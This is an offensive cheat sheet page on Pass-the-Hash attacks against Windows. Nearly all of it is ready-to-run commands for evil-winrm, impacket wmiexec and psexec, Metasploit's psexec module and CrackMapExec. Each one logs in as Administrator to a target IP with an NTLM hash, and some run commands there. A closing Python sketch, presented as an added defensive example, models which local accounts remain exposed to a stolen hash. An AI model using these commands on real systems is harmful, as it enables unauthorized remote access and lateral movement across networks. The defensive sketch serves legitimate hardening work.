>_ shadow.red

Pass-the-Hash (PtH)


evil-winrm

evil-winrm -u Administrator -H 37cb630168e5f82aafa8461e05c6bbd1 -i 10.130.126.152

impacket-wmiexec

impacket-wmiexec -hashes :37cb630168e5f82aafa8461e05c6bbd1 Administrator@10.130.126.152

impacket-psexec

impacket-psexec HALO/Administrator@10.130.126.152 -hashes :37cb630168e5f82aafa8461e05c6bbd1
rlwrap impacket-psexec HALO/Administrator@10.130.126.152 -hashes :37cb630168e5f82aafa8461e05c6bbd1

Metasploit psexec with hash

use exploit/windows/smb/psexec
set SMBDomain WORKGROUP
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:13e23qdadssadasdd1w1dw1wsd
set target Command
run

CrackMapExec PtH + command exec

crackmapexec smb 10.2.25.212 -u Administrator -H "adfsdffew32r23rsdfdfsfds"
crackmapexec smb 10.2.25.212 -u Administrator -H "adfsdffew32r23rsdfdfsfds" -x "ipconfig"

Limitation since 2014

PtH only works against the built-in local Administrator (RID 500) and domain accounts, not against other local admin accounts.
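The rule above matches how Windows filters the token of local accounts on network logons. The sketch below is an added example, not part of the original page: it models that rule so a defender can list which local accounts on a host would still yield a full admin token from a stolen hash. It goes beyond the page by including two real registry values the page does not name (LocalAccountTokenFilterPolicy and FilterAdministratorToken); the hosts and accounts are constructed.

```python
from dataclasses import dataclass

# Real Windows registry values (not named on the page), both under
# HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.
# A missing value behaves like 0.

@dataclass
class HostPolicy:
    name: str
    local_account_token_filter_policy: int = 0  # 1 = no remote filtering of local admins
    filter_administrator_token: int = 0         # 1 = RID 500 is subject to UAC too

@dataclass
class Account:
    name: str
    is_domain: bool
    rid: int
    is_local_admin: bool = True

def remote_logon_is_elevated(host: HostPolicy, acct: Account) -> bool:
    """True if a network logon as acct receives a full administrator token."""
    if not acct.is_local_admin:
        return False
    if acct.is_domain:
        return True   # domain accounts are not filtered
    if host.local_account_token_filter_policy == 1:
        return True   # filtering switched off for every local admin
    if acct.rid == 500:
        return host.filter_administrator_token != 1
    return False      # other local admins get a filtered token

def exposed_local_accounts(hosts, accounts):
    """Map host name -> local accounts whose hash, if stolen, gives remote admin."""
    return {
        h.name: [a.name for a in accounts
                 if not a.is_domain and remote_logon_is_elevated(h, a)]
        for h in hosts
    }

# Constructed sample inventory (hypothetical hosts and accounts).
HOSTS = [
    HostPolicy("WS01"),
    HostPolicy("WS02", local_account_token_filter_policy=1),
    HostPolicy("WS03", filter_administrator_token=1),
]
ACCOUNTS = [
    Account("Administrator", is_domain=False, rid=500),
    Account("helpdesk", is_domain=False, rid=1001),
    Account("svc_admin", is_domain=True, rid=1105),
]

if __name__ == "__main__":
    for host, names in exposed_local_accounts(HOSTS, ACCOUNTS).items():
        print(host, names or "none")
```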